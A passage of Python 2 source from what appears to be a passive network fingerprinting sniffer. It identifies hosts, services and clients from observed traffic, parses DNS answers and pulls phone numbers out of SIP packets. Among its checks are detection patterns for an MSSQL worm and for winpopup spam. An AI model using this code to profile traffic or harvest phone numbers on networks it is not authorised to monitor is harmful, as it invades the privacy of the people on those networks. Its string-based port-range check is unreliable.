ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport 
== \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. 
First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' 
:\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. 
Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif 
(Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 
1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == 
\"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif 
(Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 